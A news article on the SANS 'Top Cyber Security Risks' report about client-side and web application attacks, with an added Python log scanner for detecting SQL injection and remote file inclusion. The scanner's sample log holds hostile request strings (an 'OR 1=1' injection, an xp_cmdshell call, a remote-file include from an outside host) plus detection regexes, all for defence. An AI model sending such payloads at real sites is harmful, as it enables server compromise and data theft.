New Report: Cyber Attacks Exploit 2 Vulnerabilities
More than Half of All Strikes Target Client-side Software, Websites
This is the main finding of "The Top Cyber Security Risks," a new report based on data from actual attacks against organizations. The report, compiled by security vendors TippingPoint and Qualys, as well as the Internet Storm Center and SANS Institute, finds that client-side software and Internet-facing websites are organizations' greatest - and most overlooked - cyber risks.
Waves of targeted email attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office, says Alan Paller, Research Director at SANS. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers who have infected visitors via insecure websites, he says.
[Note: For more insights from Paller on cyber risks, listen to this new podcast interview.]
Ed Skoudis, senior security consultant at Inguardians, a risk assessment and security forensics company, urges organizations to radically improve their protection. "Because exploitation of client-side programs such as browsers and media-playing software is such a dominant vector of attack today, organizations need to employ two reinforcing mechanisms to accomplish this," Skoudis says.
The report also offers best practices in mitigation and control of the top risks, as well as a tutorial, analysis of four key attacks, and advice from security experts who urge action to mitigate these critical risks.
How Client-side Exploits Happen
Client-side software is so exposed because client programs are now the front door through which attackers walk to gain access to the rest of the environment. "Without proper security of client systems, attackers can compromise such systems on internal networks and use them as a jump-off point for complete control within an enterprise environment," Skoudis notes.
Because visitors feel safe downloading documents from trusted sites, they are easily fooled into opening documents and media (music, videos) that exploit client-side vulnerabilities. Some exploits do not even require the user to open documents. Simply accessing an infected website is all that is needed to compromise the client software.
The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations, and also to install back doors through which the attackers can return for further exploitation.
Web Application Attacks
The second critical area on which hackers are focusing is vulnerable Internet-facing web applications. Attacks against web applications constitute more than 60 percent of the total attack attempts observed on the Internet, according to the report. These vulnerabilities are being exploited widely to convert trusted websites into malicious sites, serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and cross-site scripting flaws in open-source as well as custom-built applications account for more than 80 percent of the vulnerabilities being discovered. Most website owners are running scans every quarter, but most of those scans look for operating system errors and are ineffective at finding SQL injection or cross-site scripting flaws.
The Internet Storm Center sees the attacks these hackers are making, says Dr. Johannes Ullrich, head of the center. "We do get a lot of reports of exploited web applications that are then used to reflect attacks to users of the web applications," he says.
In many cases, the web applications are compromised via mass-customized tools that are able to detect and exploit a wide range of vulnerabilities (for example web applications with SQL injection flaws running Microsoft SQL server as a back end, or web applications written in PHP with remote file inclusion vulnerabilities). "These attacks are so successful because users trust these websites and are willing to install software or follow links that are offered by these websites," Ullrich adds.
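The two flaw classes Ullrich names (SQL injection against a Microsoft SQL Server back end, and remote file inclusion in PHP applications) leave recognizable traces in web server access logs, which is where an administrator would go to find out whether the mass-customized tools described above have visited. The following is an added example, not code from the report, the Internet Storm Center or SANS: a small Python scanner that flags such requests in constructed sample log lines; the signatures and the log lines are assumptions for illustration, not the report's data.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined access-log format (not taken from the report).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2009:10:01:02 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2009:10:01:09 +0000] "GET /news.php?id=12%27%20OR%201%3D1-- HTTP/1.1" 200 9800 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2009:10:02:15 +0000] "GET /index.php?page=http://203.0.113.200/s.txt HTTP/1.1" 200 300 "-" "libwww-perl/5.8"
203.0.113.11 - - [10/Sep/2009:10:02:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
203.0.113.13 - - [10/Sep/2009:10:03:01 +0000] "GET /list.asp?cat=3;exec%20xp_cmdshell HTTP/1.1" 500 120 "-" "Mozilla/4.0"
"""

# Combined log format: client IP, identd, user, timestamp, request line, status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Illustrative detection signatures (assumed, not the report's) for the two flaw classes.
RULES = {
    # Quoted boolean tautologies, comment terminators, stacked MSSQL procedure calls, UNION-based reads.
    "sqli": re.compile(r"(?i)('|\")\s*(or|and)\s+\S+\s*=\s*\S+|--\s*$|;\s*exec\b|xp_cmdshell|union\s+select"),
    # A query parameter whose value is a remote URL, the shape of a PHP remote file inclusion attempt.
    "rfi": re.compile(r"(?i)=\s*(https?|ftp)://"),
}


def classify_request(url: str) -> list[str]:
    """Return the names of the rules matched by a request URL's query string (empty if clean)."""
    decoded = unquote_plus(url)          # tools commonly URL-encode the payload; decode before matching
    query = decoded.partition("?")[2]    # only the query string is untrusted input here
    return [name for name, rx in RULES.items() if rx.search(query)]


def scan_log(text: str) -> list[dict]:
    """Parse each access-log line and report the requests that hit at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing at their fields
        hits = classify_request(m["url"])
        if hits:
            findings.append({"ip": m["ip"], "url": m["url"], "status": m["status"], "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {','.join(f['rules']):5} {f['status']} {f['url']}")
```

A status of 200 on a flagged request (as on the second and third sample lines) is the case worth investigating first, since it suggests the application accepted the input rather than rejecting it.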
These attacks also affect millions of systems and are among the most pervasive ways to distribute malware, Ullrich observes, "At the Internet Storm Center, we focus on these large scale attacks. Some of the other attacks mentioned in the report (for example the pass the hash attacks) are not as commonly used, but if they are used they can be very devastating and affect an entire enterprise."
On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities, according to the new report. In other words, the highest priority risk (client-side vulnerabilities) is getting less attention than the lower priority risk (OS vulnerabilities).
Skoudis says organizations need a better system for deploying patches to client-side software, especially third-party programs. "Also, they need to configure their systems so that users log on to systems without local administrative privileges," he adds. Web application vulnerabilities continue to proliferate, acting as a vehicle for client infection or for stealing sensitive data.
The shift of attention by hackers also must be recognized, Skoudis says. The battle has moved from targeting traditional network services to a focus on client-side software and web applications. "We can't let our guard down on the other front, however, of traditional network services," he says. "But we can see how much we have to now focus on the big battleground of today."
Ullrich agrees with Skoudis, adding that the automated, large-scale exploitation of web applications will continue and become more sophisticated. "These attacks can be mass-customized and launched with simple tools against a large number of systems," he says. "Developers need to prevent these simple flaws in the future, and system administrators need to find better ways to inventory and secure these applications in the enterprise."
This report is different from any study done before, says Paller, because it reflects massive amounts of data on the actual attacks (millions of them) and on the speed with which the underlying vulnerabilities are being patched (actual data from thousands of companies).
"The amazing data is that enterprises are prioritizing what is unimportant, and delaying fixing the main attack targets," Paller says. "I think [the report] will shift a lot of money around in a lot of organizations because the findings are very hard to ignore. Given the strength of the data, not acting would be obvious negligence."